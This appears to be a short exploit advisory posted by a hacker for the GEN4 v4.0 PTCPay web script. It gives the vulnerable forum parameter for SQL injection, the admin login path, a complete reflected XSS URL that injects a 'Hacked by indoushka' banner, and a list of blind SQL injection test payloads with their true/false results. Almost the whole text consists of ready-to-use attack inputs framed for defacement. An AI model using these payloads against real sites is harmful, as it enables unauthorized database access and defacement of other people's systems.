GEN4 v4.0 PTCPay Multi Vulnerability
====================================
Author : indoushka
Vondor : http://www.p30vel.ir/
Dork : GeN4 © 2009
======================================
Sql inj :
http://127.0.0.1/GEN/forum/main_forum.php?cat=1 (inject her)
login : http://127.0.0.1/GEN/admin/
( XSS / HTML Inject ) :
http://127.0.0.1/GEN/forum/search.php?a=1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&q=1&Submit=1
Blind SQL Injection :
This vulnerability affects /GEN/forum/main_forum.php.
Attack details
URL encoded GET input cat was set to 1/**/AND/**/307=307
Tests performed:
0+0+0+1 => TRUE
0+307*302+1 => FALSE
11-5-2-999 => FALSE
11-5-2-3 => TRUE
11-2*5+0+0+1-1 => TRUE
11-2*6+0+0+1-1 => FALSE
1 AND 2+1-1-1=1 AND 307=307 => TRUE
1 AND 3+1-1-1=1 AND 307=307 => FALSE
1 AND 3*2<5 AND 307=307 => FALSE
1 AND 3*2>5 AND 307=307 => TRUE
1/**/AND/**/0=1/**/AND/**/307=307 => FALSE
1/**/AND/**/307=307 => TRUE
Original value: 1
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================